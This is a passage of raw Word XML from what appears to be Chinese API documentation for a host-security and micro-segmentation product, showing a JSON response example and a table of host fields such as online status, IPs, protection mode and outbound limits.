      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"runLevel": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"updateUsername": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"updateTime": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"osPlatform": "linux",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"blackStrategyEnable": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"filters": {},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC29F5"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2177"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="5555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1269349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242801C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C397F6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14DA367E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B250A96" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6913AD97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F77C28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B62DF80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0D3A280A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57141B92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39728C47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A7C4A45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>在线状态,0离线 1在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2BD2A45D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B1EBB90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350E3212" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA39D33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1229D8A6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AF860EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIpBak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35AB0F1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E6F62AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>匹配ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7BE5F425" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A69228E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ips</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E5FA203" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D733AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机所有ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C149F53" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD42527" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48A230CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1136BD9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F0E3003" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E311FF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DA37D39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0407ECA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7FB83485" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E54B42A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32907744" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3C3488" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3599D12C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C3E0E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D97F13B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="790E532D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76DBEDA5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68FA4725" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>msEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64883F30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59ED1217" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离开关：0关闭 1开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="352CE7C7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E38C55B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dcSyncNum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12F81BFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535669FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略已同步数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D78A3A7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16C4811B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dcNotSyncNum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B99AB0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2143B4B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略未同步状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31B379CE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="582B08F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accessControlMode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="060400FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A6BD27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问控制模式: null未设置 0服务控制模式 1主机控制模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12D92DFE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D54983F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41617C82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F255FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03779F98" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30C61868" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>runStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AA30AEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE6E1F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>运行状态，运行状态: warn告警 monitor监控 protect防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B829B9E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F323C0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>protectService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65366A2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73944E09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自定义防护服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="585EAED8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C98C90C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>limitOut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C65CA99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3819FF2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>出站限制,0不允许出站 1允许出站</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="161C36C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43668456" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>checkStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EEFB859" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D8017C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7FE23246" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="536D7CAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>availableReason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A54EEA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1753AB60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不可用原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="323CFEF0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23AFB4AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26B2ED19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="393E9DEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统类型，1：linux， 2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3ED03478" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="690D0A5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>runLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34536F12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FD8E4D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>运行级别 ，0：整除，1：降级，2：停用，3：自动降级</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A91622E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5479BF20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateUsername</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA61F2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="490687B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作人名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F4CFAAB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56704B5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D0801A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27345FD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D341181" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="673943DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AED7C02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
